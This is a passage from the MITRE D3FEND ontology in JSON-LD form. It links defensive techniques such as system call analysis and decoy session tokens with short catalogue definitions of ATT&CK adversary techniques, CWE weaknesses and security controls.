      "d3f:definition": "Physical link mapping identifies and models the link connectivity of the network devices within a physical network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension"
      },
      "d3f:maps": [
        {
          "@id": "d3f:NetworkNode"
        },
        {
          "@id": "d3f:PhysicalLink"
        }
      ],
      "d3f:synonym": "Layer 1 Mapping",
      "rdfs:label": "Physical Link Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_topology#Links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N12f1c2b9d73042e58671c46c70a2addf"
        },
        {
          "@id": "_:N7e956c6b2e9f4128975e8b9cbd32dcc8"
        }
      ]
    },
    {
      "@id": "_:N12f1c2b9d73042e58671c46c70a2addf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "_:N7e956c6b2e9f4128975e8b9cbd32dcc8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:T1652",
      "@type": "owl:Class",
      "d3f:attack-id": "T1652",
      "d3f:definition": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).",
      "rdfs:label": "Device Driver Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:NetworkCardFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on a network card (network interface controller).",
      "rdfs:label": "Network Card Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:Network_interface_controller"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Network Controller Firmware"
    },
    {
      "@id": "d3f:MulticlassClassification",
      "@type": "owl:Class",
      "rdfs:label": "Multiclass Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classifying"
      }
    },
    {
      "@id": "d3f:SuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Suspending a thread causes the thread to stop executing user-mode code.",
      "d3f:suspends": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Suspend Thread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Na531ae0138ec48ecb6e1921671b068cd"
        }
      ]
    },
    {
      "@id": "_:Na531ae0138ec48ecb6e1921671b068cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:OTControlLogicProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": {
        "@id": "d3f:OTIOModule"
      },
      "d3f:contains": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:controls": {
        "@id": "d3f:OTActuator"
      },
      "d3f:definition": "The instructions and algorithms within an OT Controller defined by user programming to interpret inputs, process information, and determine outputs.",
      "d3f:monitors": {
        "@id": "d3f:OTSensor"
      },
      "rdfs:label": "OT Control Logic Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:Nc4c7e411782d4be88067b0a5afe496fc"
        },
        {
          "@id": "_:N0972db3008fe4a0a93b00b7eb3b29c19"
        },
        {
          "@id": "_:N65b70d0bd1be40f99cab9c309e0afa21"
        },
        {
          "@id": "_:N051840a9a7214beda6922d81636b364d"
        }
      ]
    },
    {
      "@id": "_:Nc4c7e411782d4be88067b0a5afe496fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTIOModule"
      }
    },
    {
      "@id": "_:N0972db3008fe4a0a93b00b7eb3b29c19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:N65b70d0bd1be40f99cab9c309e0afa21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:controls"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTActuator"
      }
    },
    {
      "@id": "_:N051840a9a7214beda6922d81636b364d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSensor"
      }
    },
    {
      "@id": "d3f:LM-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0006",
      "d3f:definition": "During integration and ascent, payloads and the launch vehicle exchange power, discrete lines, and data via umbilicals, separation avionics, and shared EGSE networks. Protections can be reduced or heterogeneous because timelines are tight and responsibilities cross organizations. An attacker positioned on either side (vehicle or payload) can use these commissioning links, health/status queries, time distribution, inhibit lines, separation commands, or telemetry gateways, to inject messages, transfer files, or alter configuration that propagates across the interface. Before fairing close and prior to separation, this brief but high-trust coupling provides a route to move from one platform to the other and to seed artifacts that persist after deployment.",
      "rdfs:label": "Launch Vehicle Interface - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Launch Vehicle Interface"
    },
    {
      "@id": "d3f:Artifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A man-made object taken as a whole.",
      "rdfs:label": "Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "http://d3fend.mitre.org/ontologies/d3fend.owl"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00022119-n"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:HardwareDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a device driver (commonly referred to simply as a driver) is a computer program that operates or controls a particular type of device that is attached to a computer. A driver provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details of the hardware being used. A driver communicates with the device through the computer bus or communications subsystem to which the hardware connects. When a calling program invokes a routine in the driver, the driver issues commands to the device. Once the device sends data back to the driver, the driver may invoke routines in the original calling program. Drivers are hardware dependent and operating-system-specific. They usually provide the interrupt handling required for any necessary asynchronous time-dependent hardware interface.",
      "d3f:drives": {
        "@id": "d3f:HardwareDevice"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Device_driver"
      },
      "rdfs:label": "Hardware Driver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N88c8699037d6400ab2bcd09ef90ff414"
        }
      ],
      "skos:altLabel": "Device Driver"
    },
    {
      "@id": "_:N88c8699037d6400ab2bcd09ef90ff414",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:WindowsNtReadFileScatter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads specified block from file into multiple buffers. Each buffer must have one page length.",
      "rdfs:label": "Windows NtReadFileScatter",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:T1492",
      "@type": "owl:Class",
      "d3f:attack-id": "T1492",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.001",
      "rdfs:label": "Stored Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-ServiceSearchPathInterception_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-07-001/"
      },
      "d3f:kb-abstract": "According to ATT&CK, an adversary may escalate privileges by intercepting the search path for legitimately installed services. As a result, Windows will launch the target executable instead of the desired binary and command line. This can be done when there are spaces in the binary path and the path is unquoted. Search path interception should never happen legitimately and will likely be the result of an adversary abusing a system misconfiguration. With a few regular expressions, it is possible to identify the execution of services with intercepted search paths.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-07-001: Service Search Path Interception",
      "rdfs:label": "Reference - CAR-2014-07-001: Service Search Path Interception - MITRE"
    },
    {
      "@id": "d3f:T1497.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497.001",
      "d3f:definition": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "System Checks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1497"
      }
    },
    {
      "@id": "d3f:SystemConfigurationPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemConfigurationPermissions"
      ],
      "d3f:d3fend-id": "D3-SCP",
      "d3f:definition": "Restricting system configuration modifications to a specific user or group of users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowToChangeRegistryValuesOrPermissionsFromACommandLineOrAScript"
      },
      "d3f:restricts": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "System Configuration Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N3396d26c2f6f4f69a2fca2a86777c634"
        }
      ]
    },
    {
      "@id": "_:N3396d26c2f6f4f69a2fca2a86777c634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CCI-001427_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system allows authorized users to associate security attributes with information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001427"
    },
    {
      "@id": "d3f:T1003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1003",
      "d3f:definition": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.",
      "rdfs:label": "OS Credential Dumping",
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CommonAttackPattern",
      "@type": "owl:Class",
      "d3f:definition": "A common attack pattern that is in the CAPEC knowledge base.",
      "rdfs:label": "Common Attack Pattern",
      "rdfs:subClassOf": {
        "@id": "d3f:CAPECThing"
      }
    },
    {
      "@id": "d3f:PartialMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PM",
      "d3f:definition": "Partial string pattern matching is a special case of string pattern matching where one seeks to find a pattern within a larger string (text). It allows for the detection of patterns that occur as substrings or partial segments within the full string, rather than requiring an exact match across the entire string.",
      "d3f:kb-article": [
        "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
        "Numeric pattern matching is a method of matching some defined pattern specification against a numeric value."
      ],
      "rdfs:label": "Partial Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:StringPatternMatching"
      }
    },
    {
      "@id": "d3f:T1025",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "d3f:attack-id": "T1025",
      "d3f:definition": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
      "rdfs:label": "Data from Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nc97e6771f50449cb85a6a45d86b35c9b"
        }
      ]
    },
    {
      "@id": "_:Nc97e6771f50449cb85a6a45d86b35c9b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:CWE-1280",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1280",
      "d3f:definition": "A product's hardware-based access control check occurs after the asset has been accessed.",
      "rdfs:label": "Access Control Check Implemented After Asset is Accessed",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:T1137.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:Software"
      },
      "d3f:attack-id": "T1137.006",
      "d3f:definition": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)",
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:modifies": {
        "@id": "d3f:OfficeApplication"
      },
      "rdfs:label": "Add-ins",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Nc76d3986eff94392b862aa5297daed68"
        },
        {
          "@id": "_:Nfc8c5bae33b24b28ad25a320a992c97b"
        },
        {
          "@id": "_:Ne64b5a8ec3484959956e0843a9b05014"
        }
      ]
    },
    {
      "@id": "_:Nc76d3986eff94392b862aa5297daed68",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:Nfc8c5bae33b24b28ad25a320a992c97b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:Ne64b5a8ec3484959956e0843a9b05014",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplication"
      }
    },
    {
      "@id": "d3f:BarcodeScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A barcode reader (or barcode scanner) is an optical scanner that can read printed barcodes, decode the data contained in the barcode and send the data to a computer. Like a flatbed scanner, it consists of a light source, a lens and a light sensor translating for optical impulses into electrical signals. Additionally, nearly all barcode readers contain decoder circuitry that can analyze the barcode's image data provided by the sensor and sending the barcode's content to the scanner's output port.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Barcode_reader"
      },
      "rdfs:label": "Barcode Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageScannerInputDevice"
      },
      "skos:altLabel": "Barcode Reader"
    },
    {
      "@id": "d3f:Reference-CyberCommandSystemCYCS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mitre.org/research/technology-transfer/technology-licensing/cyber-command-system-cycs"
      },
      "d3f:kb-abstract": "MITRE’s Cyber Command System (CyCS) tool addresses the objective of improved mission assurance in cyberspace by enabling the mapping of mission operations to the network operations that support those missions. This tool provides mission-impact assessment through situational awareness and impact analysis. CyCS addresses mission-assurance challenges for highly distributed enterprise systems of systems through vulnerability, threat, and consequence management.",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Cyber Command System (CYCS)",
      "rdfs:label": "Reference - Cyber Command System (CYCS)"
    },
    {
      "@id": "d3f:T1488",
      "@type": "owl:Class",
      "d3f:attack-id": "T1488",
      "d3f:definition": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1561.001",
      "rdfs:label": "Disk Content Wipe",
      "rdfs:seeAlso": {
        "@id": "d3f:T1561.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-IntegerRangeValidation_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://resources.sei.cmu.edu/downloads/secure-coding/assets/sei-cert-c-coding-standard-2016-v01.pdf"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": {
        "@id": "d3f:IntegerRangeValidation"
      },
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Integer Range Validation"
    },
    {
      "@id": "d3f:CWE-424",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-424",
      "d3f:definition": "The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.",
      "rdfs:label": "Improper Protection of Alternate Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-638"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:SMBFileOverwriteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened and truncated if it exists, failing if the file does not already exist. This operation is destructive and focuses on replacing the file's contents.",
      "rdfs:label": "SMB File Overwrite Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SMBEvent"
        },
        {
          "@id": "_:Nbdf0889f47834ec9869df378ed5bfc30"
        }
      ]
    },
    {
      "@id": "_:Nbdf0889f47834ec9869df378ed5bfc30",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SMBFileCreateEvent"
      }
    },
    {
      "@id": "d3f:ATTACKICSCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0100"
      },
      "rdfs:label": "Collection Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N3cba61b8b67646e4a6af7fcbdb5313b1"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N3cba61b8b67646e4a6af7fcbdb5313b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0100"
      }
    },
    {
      "@id": "d3f:T1590.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.001",
      "d3f:definition": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.",
      "rdfs:label": "Domain Properties",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:T1519",
      "@type": "owl:Class",
      "d3f:attack-id": "T1519",
      "d3f:definition": "Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.014",
      "rdfs:label": "Emond",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.014"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-368",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-368",
      "d3f:definition": "A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product's behavior during the switch.",
      "rdfs:label": "Context Switching Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:SystemCallAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCallAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:d3fend-id": "D3-SCA",
      "d3f:definition": "Analyzing system calls to determine whether a process is exhibiting unauthorized behavior.",
      "d3f:kb-article": "## How it works\n\nSystem calls are APIs between a user application and the operating system [1].\n\nBy analyzing a process's use of these APIs, it is, in some cases, possible to ascertain whether a program is exhibiting unauthorized behavior, including trying to escalate its privileges.\n\n### Gathering System Calls\nA common method to capture system calls is to use kernel APIs to hook [2] a process's system call invocations.\n\nThe Linux system call `ptrace` tracks other system calls in a process and allows their alteration; this is made use of by GDB.  `strace` utilizes `ptrace` and will print to stdout each system call invoked. Other applications record this data in local or remote databases.\n\nThe log entry for each system call, which may reference additional information such as the date and time, and the process tree for the process which made the system call, is relayed, in real time or post-facto, to an analysis module which consults a catalog or model to determine whether the distribution matches a known-good or known-bad pattern.\n\n\n### Analysis\n\nSystem calls are analyzed with a variety of methods. Some analytics look for specific sequences of instructions, others may apply statistical methods to identify abnormal behavior. Sequences of instructions can be abstracted into conceptually higher order user activities, for example:\n\n* An attacker executes many system calls in a short period of time, with several sequences which could be used to escalate privileges.\n* Getting the contents from a URL, writing to a new file, and then executing the same file.\n* A ransomware program which either uses a loop or creates many threads to: read a specified file, encrypt its contents, create an output file with a similar name to the original file, and delete the unencrypted original.\n\n## Considerations\n\n* Duplicative or extraneous system calls may be added to malware to defeat analytics.\n* Malware could replace API hooking instructions to allow system calls to be made without being monitored.\n* A model built from a training set of system calls and related data may not be updated fast enough to detect new threats.\n\n\n[1] [Syscalls](http://man7.org/linux/man-pages/man2/syscalls.2.html)\n\n[2] [Hooking](http://dbpedia.org/resource/Hooking)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CredentialDumpingViaWindowsTaskManager_MITRE"
        },
        {
          "@id": "d3f:Reference-DLLInjectionViaLoadLibrary_MITRE"
        },
        {
          "@id": "d3f:Reference-DeterministicMethodForDetectingAndBlockingOfExploitsOnInterpretedCode_K2CyberSecurityInc"
        },
        {
          "@id": "d3f:Reference-Hardware-assistedSystemAndMethodForDetectingAndAnalyzingSystemCallsMadeToAnOpertingSystemKernel_EndgameInc"
        },
        {
          "@id": "d3f:Reference-MalwareDetectionInEventLoops_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-PostSandboxMethodsAndSystemsForDetectingAndBlockingZero-dayExploitsViaApiCallValidation_K2CyberSecurityInc"
        },
        {
          "@id": "d3f:Reference-CAR-2020-05-001%3AMiniDumpOfLSASS_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-011%3ACreateRemoteThreadIntoLSASS_MITRE"
        }
      ],
      "rdfs:label": "System Call Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N3fe3e21928104987a340c0983cd28f08"
        }
      ]
    },
    {
      "@id": "_:N3fe3e21928104987a340c0983cd28f08",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:T1500",
      "@type": "owl:Class",
      "d3f:attack-id": "T1500",
      "d3f:definition": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.004",
      "rdfs:label": "Compile After Delivery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000226_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutionIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for a privileged administrator to configure organization-defined security policy filters to support different security policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000226"
    },
    {
      "@id": "d3f:T1548.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.004",
      "d3f:creates": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:definition": "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Elevated Execution with Prompt",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:Nf3f485e9b5e14a8590bd4df4bb6bc409"
        },
        {
          "@id": "_:N90efda12122449c08685f4f2b5a8bb21"
        }
      ]
    },
    {
      "@id": "_:Nf3f485e9b5e14a8590bd4df4bb6bc409",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N90efda12122449c08685f4f2b5a8bb21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:DigitalAudio",
      "@type": "owl:Class",
      "d3f:definition": "Digital audio is a representation of sound recorded in, or converted into, digital form.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_audio",
      "rdfs:label": "Digital Audio",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:DecoySessionToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoySessionToken"
      ],
      "d3f:d3fend-id": "D3-DST",
      "d3f:definition": "An authentication token created for the purposes of deceiving an adversary.",
